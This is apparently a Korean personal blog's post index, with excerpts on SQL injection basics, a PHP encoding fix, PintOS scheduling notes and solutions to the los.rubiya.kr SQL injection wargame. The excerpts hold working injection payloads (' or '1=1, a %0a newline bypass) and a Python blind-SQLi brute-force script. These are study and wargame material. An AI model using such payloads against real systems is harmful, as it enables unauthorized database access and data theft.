TenBird TenBird

전체 글

• SQL-Injection 정리(1)

  Web 2020. 3. 19. 19:01

  기본적인 에러기반 SQL Injection --> ' or '1=1 이것을 기본으로 필터링 또는 우회해서 문제를 푼다. ex) select id from test where id='{$_GET[id]}' and pw='{$_GET[pw]}' 현재 GET 방식으로 파라미터를 전달하고 있다. url이 ~~.php?id=admin&&pw=admin 이라 하면 sql 구문은 select id from test where id='admin' and pw='admin' 으로 삽입이 되어진다. 여기에 아무 필터링이 없다는 가정하에 ~~.php?id=admin&&pw=admin' or '1=1 을 입력하게 되면 select id from test where id='admin' and pw='admin' or '1=1'..

  Read More
• php- PHP-DB insert시 한글깨짐 해결

  PHP 2020. 3. 17. 18:22

  $s = mysql_connect("localhost","root","1234") or die("실패입니다"); mysql_select_db("usertest"); mysql_set_charset('utf8',$s);

  Read More
• PHP - 게시판 만들기 시작..

  보호글 2020. 3. 17. 16:36

  보호되어 있는 글입니다.

  Read More
• 개강 언제하냐ㅑㅑㅑㅑㅑㅑㅑㅑㅑㅑㅑㅑㅑㅑㅑㅑㅑㅑㅑㅑ

  보호글 2020. 3. 12. 17:33

  보호되어 있는 글입니다.

  Read More
• PintOS - Busy Waiting 바쁜대기 - 2

  운영체제 2020. 1. 22. 16:04

  /* Sleeps for approximately TICKS timer ticks. Interrupts must be turned on. */ void timer_sleep (int64_t ticks) { int64_t start = timer_ticks (); ASSERT (intr_get_level () == INTR_ON); while (timer_elapsed (start) /pintos/src/threads/thread.c

  Read More
• PintOS - Busy Waiting 바쁜대기 - 1

  운영체제 2020. 1. 22. 15:27

  세마포의 정의 P(S) : wait(S){ while S

  Read More
• los.rubiya.kr

  카테고리 없음 2019. 12. 10. 16:21

  줄바꿈 %0a 이용 ''https://los.rubiya.kr/chall/dragon_51996aa769df79afbf79eb4d66dbcef6.php?pw='%0a and pw = '123' or id = 'admin

  Read More
• los.rubiya xavis

  Los 문제풀이 2019. 12. 5. 15:47

  import requests import urllib3 #pw=1%27||substr(hex(pw),1,2)%20=%2700 url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?" cookies = dict(PHPSESSID="kg75d303va7jetmfma123j9scv") a="" for i in range(1,25): for k in range(48,123): param1 = "pw=1%27||substr(hex(pw)," + str(i) + ",1" ")%20=%27"+chr(k) att = url + param1 res = requests.post(url=att,cookies=cookies) if "Hell..

  Read More
이전
1 2 3 4 5 6
다음